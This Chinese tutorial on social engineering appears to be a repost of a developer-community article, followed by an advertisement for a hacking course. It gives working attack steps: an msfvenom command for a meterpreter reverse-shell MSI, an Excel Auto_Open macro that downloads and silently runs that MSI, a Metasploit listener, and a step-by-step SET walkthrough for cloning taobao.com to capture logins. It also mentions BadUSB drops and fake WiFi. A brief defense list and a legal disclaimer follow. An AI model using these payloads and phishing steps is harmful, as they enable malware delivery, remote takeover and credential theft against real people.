社工思路和防范措施

前言

1. 社工概述

不是技术性攻击，利用的人类弱点，利用欺骗，操纵，诱骗

利用被授权的人（公司财务、公司人事，公司网络管理员，开发人员）

存在风险

技术漏洞 vs 人的漏洞；渗透 vs 社工

人的漏洞比系统技术的漏洞危害更大，82%漏洞来自人

【----帮助零基础学习，以下所有学习资料文末免费领！----】

1.1 电信诈骗手段

社会工程学利用了人类多种弱点

1、好奇心2、信任3、恐惧4、无知5、疏忽

1.2 社工策略

2. 社工攻击流程

1、收集目标信息（人事、保安、运维……） 社交网站、冒充身份获取、社工库、远控

2、伪造身份与目标接触（求职者、维修工、同事）

3、编造谎言迷惑目标（发送邮件、连接网络、进 入机房）

4、展开攻击（接入网络、控制机器、窃取信息）

信息搜集

个人信息收集内容与方法 https://mp.weixin.qq.com/s/dt2yHvWDIcdpnC3ag5gXsw 

个人信息泄露查询 
https://monitor.firefox.com/
https://haveibeenpwned.com/ 

注册查询 https://www.reg007.com/ http://regbao.com/ 

阿里云实名认证接口 https://market.aliyun.com/products/57000002/cmapi025518.html

火狐自带的泄漏查询

https://monitor.firefox.com/

外网查泄漏

https://haveibeenpwned.com/

查询手机注册过的网站

https://www.reg007.com/http://regbao.com/

3. 社工案例&工具

3.1 钓鱼邮件

1、获得邮箱地址或者账号密码
2、伪造发件人邮件地址（不一定能成功）
3、撰写有吸引力的主题 
4、撰写有说服力的内容
5、诱导点击或者下载

3.2 msi宏文件

msfvenom生成msi宏文件

1、获得邮箱地址或者账号密码

利用kali生成一个宏病毒

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f msi -o hack.msi

新建excel文件，保存为xlsm

=EXEC("msiexec /q /I http://192.168.142.66/hack.msi") =HALT()

将第一行模式修改为：

Auto_Open

并Enter回车，自动运行宏。

office 宏病毒MSF监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.142.132
set lport 4444
run

3.3 钓鱼网站

1、注册类似域名；伪造子域名

2、仿冒界面

3、记录用户输入内容

kali工具 setoolkit

直接可以克隆一个网站

如果在其他操作系统中克隆，更换social-engineer地址即可
https://github.com/trustedsec/social-engineer-toolkit.git

3.4 SET克隆网站步骤

（1）开启kali

首先开启kali，打开root窗口

启动工具

setoolkit

工具设置注释

Social-Engineering Attacks——社工 
Website Attack Vectors——网站
Credential Harvester Attack Method——凭据
Site Cloner——站点克隆

（2）设置选择

我们先选社工工程学攻击（1回车）

然后选攻击网站（2）

选攻击网站的凭据（3）

克隆站点（2）

（3）输入克隆网站

直接默认回车，然后输入想要克隆的网页

https://www.taobao.com/

直接回车

克隆成功，查看克隆网站

假设此刻有用户输入登录信息

用户回车登录，就会在后台显示登录名和密码

3.5 badusb

可以监控键盘的操作

1、刻录代码

 https://store.arduino.cc/usa/arduino-leonardo-with-headers

2、扔下U盘

3、恶意代码自动运行

3.6 近源攻击

1、面试入职

2、在公司附近连接公司WiFi

3、无人机破解WiFi/制作钓鱼WiFi（fluxion）

可以制作一个同名的WiFi，一旦连上可以抓包

https://www.bilibili.com/read/cv21608887/

4、……

5、美女、金钱、送人情

4. 社工防范

1、身份确认：是这个人吗？有权限吗？

2、切勿轻易点击链接和打开文件

3、启用多重身份认证

4、运行杀毒软件；更新

5、不连接到不安全的WiFi

6、在社交网络中隐藏个人信息

7、安全培训；攻防演练

原文地址: https://developer.aliyun.com/article/1300706?spm=a2c6h.12873639.article-detail.108.33b7504evl9ae9&scm=20140722.ID_community@@article@@1300706._.ID_community@@article@@1300706-OR_rec-V_1-RL_community@@article@@1300680

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。 所有渗透都需获取授权！

@学习更多渗透技能！体验靶场实战练习

拿下NISP-SO网络安全证书之后，身为普通的你可以：

跨越90%企业的招聘硬门槛

增加70%就业机会

拿下BAT全国TOP100大厂敲门砖

体系化得到网络技术硬实力

IE大佬年薪可达30w+

如何入门学习网络安全【黑客】

【----帮助网安学习，以下所有学习资料文末免费领取！----】

> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集（含答案）
> ⑧ APP客户端安全检测指南（安卓+IOS）

大纲

首先要找一份详细的大纲。

学习教程

第一阶段：零基础入门系列教程

该阶段学完即可年薪15w+

第二阶段：技术入门

弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞

该阶段学完年薪25w+

阶段三：高阶提升

反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练

该阶段学完即可年薪30w+

CTF比赛视频+题库+答案汇总

实战训练营

面试刷题

最后，我其实要给部分人泼冷水，因为说实话，上面讲到的资料包获取没有任何的门槛。

但是，我觉得很多人拿到了却并不会去学习。

大部分人的问题看似是“如何行动”，其实是“无法开始”。

几乎任何一个领域都是这样，所谓“万事开头难”，绝大多数人都卡在第一步，还没开始就自己把自己淘汰出局了。

如果你真的确信自己喜欢网络安全/黑客技术，马上行动起来，比一切都重要。

资料领取

上述这份完整版的网络安全学习资料已经上传网盘，朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓
或者
【点此链接】领取

​